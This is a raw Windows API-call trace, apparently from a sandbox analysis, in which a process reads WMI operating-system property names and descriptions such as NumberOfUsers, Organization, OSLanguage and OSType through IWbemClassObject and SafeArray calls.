[0050.722] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.722] lstrlenA (lpString="") returned 0 [0050.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.722] SysStringLen (param_1="Number of process contexts currently loaded or running on the operating system.") returned 0x4f [0050.722] SysStringLen (param_1="") returned 0x0 [0050.723] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.723] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.723] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.723] SysStringLen (param_1="Description") returned 0xb [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.723] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.723] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.723] SysStringLen (param_1="Locale") returned 0x6 [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.723] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.723] SysStringLen (param_1="Name") returned 0x4 [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.723] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.723] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.724] IUnknown:Release (This=0x233e12dbe00) returned 0x1 [0050.724] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.724] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b848, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.724] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.724] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.724] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of user sessions for which the operating system is currently storing state information", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.724] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.725] lstrlenA (lpString="") returned 0 [0050.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.725] SysStringLen (param_1="Number of user sessions for which the operating system is currently storing state information") returned 0x5d [0050.725] SysStringLen (param_1="") returned 0x0 [0050.725] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.725] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.725] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.725] SysStringLen (param_1="Description") returned 0xb [0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.725] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.725] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.725] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.725] SysStringLen (param_1="Name") returned 0x4 [0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.725] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15 [0050.726] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.726] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.726] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.726] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.726] IUnknown:Release (This=0x233e12da5d0) returned 0x1 [0050.726] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.726] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.726] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128be88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.726] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.726] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Organization property indicates the the registered user's (of the operating system) company name./nExample: Microsoft Corporation.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.727] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.727] lstrlenA (lpString="") returned 0 [0050.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.727] SysStringLen (param_1="The Organization property indicates the the registered user's (of the operating system) company name./nExample: Microsoft Corporation.") returned 0x86 [0050.727] SysStringLen (param_1="") returned 0x0 [0050.727] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.727] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.728] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] SysStringLen (param_1="Description") returned 0xb [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] SysStringLen (param_1="Name") returned 0x4 [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.728] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.728] SysStringLen (param_1="Organization") returned 0xc [0050.728] IUnknown:Release (This=0x233e12d9dc0) returned 0x1 [0050.728] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.729] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128be88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.729] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b948, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.729] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.729] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The OSLanguage property indicates which language version of the operating system is installed./nExample: 0x0807 (German, Switzerland)", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.729] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.729] lstrlenA (lpString="") returned 0 [0050.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc160, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.730] SysStringLen (param_1="The OSLanguage property indicates which language version of the operating system is installed./nExample: 0x0807 (German, Switzerland)") returned 0x85 [0050.730] SysStringLen (param_1="") returned 0x0 [0050.730] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.730] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.730] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.730] SysStringLen (param_1="Description") returned 0xb [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.730] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.730] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.730] SysStringLen (param_1="Name") returned 0x4 [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.730] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.730] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.730] SysStringLen (param_1="Organization") returned 0xc [0050.730] SysStringLen (param_1="NumberOfUsers") returned 0xd [0050.730] SysStringLen (param_1="OSLanguage") returned 0xa [0050.731] IUnknown:Release (This=0x233e12db8a0) returned 0x1 [0050.731] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.731] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea568, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.731] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea7a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.731] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.731] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The OSProductSuite property identifies installed and licensed system product additions to the operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.731] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.731] lstrlenA (lpString="") returned 0 [0050.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.732] SysStringLen (param_1="The OSProductSuite property identifies installed and licensed system product additions to the operating system.") returned 0x6f [0050.732] SysStringLen (param_1="") returned 0x0 [0050.732] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.732] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.732] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] SysStringLen (param_1="Description") returned 0xb [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] SysStringLen (param_1="Name") returned 0x4 [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] SysStringLen (param_1="OSLanguage") returned 0xa [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] SysStringLen (param_1="Organization") returned 0xc [0050.732] SysStringLen (param_1="OSLanguage") returned 0xa [0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.732] IUnknown:Release (This=0x233e12db5f0) returned 0x1 [0050.733] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.733] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b948, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.733] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bf08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.733] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.733] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="A integer indicating the type of operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.733] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.733] lstrlenA (lpString="") returned 0 [0050.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc120, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.733] SysStringLen (param_1="A integer indicating the type of operating system.") returned 0x32 [0050.733] SysStringLen (param_1="") returned 0x0 [0050.734] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.734] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bf50*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271070, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.734] SafeArrayGetLBound (in: psa=0x233e128bf50, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.734] SafeArrayGetUBound (in: psa=0x233e128bf50, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.734] SafeArrayGetElement (in: psa=0x233e128bf50, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.734] IWbemClassObject:Get (in: This=0x233e12e51d0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.734] IWbemClassObject:Get (in: This=0x233e12e51d0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bfd0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12ee2e0, rgsabound=((cElements=0x3a, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.735] SafeArrayGetLBound (in: psa=0x233e128bfd0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.735] SafeArrayGetUBound (in: psa=0x233e128bfd0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.735] lstrlenW (lpString="CIMTYPE") returned 7 [0050.735] lstrlenW (lpString="Values") returned 6 [0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.735] lstrlenW (lpString="read") returned 4 [0050.735] lstrlenW (lpString="Values") returned 6 [0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3 [0050.735] lstrlenW (lpString="write") returned 5 [0050.735] lstrlenW (lpString="Values") returned 6 [0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.735] lstrlenW (lpString="In") returned 2 [0050.735] lstrlenW (lpString="Values") returned 6 [0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.735] lstrlenW (lpString="Out") returned 3 [0050.735] lstrlenW (lpString="Values") returned 6 [0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3 [0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 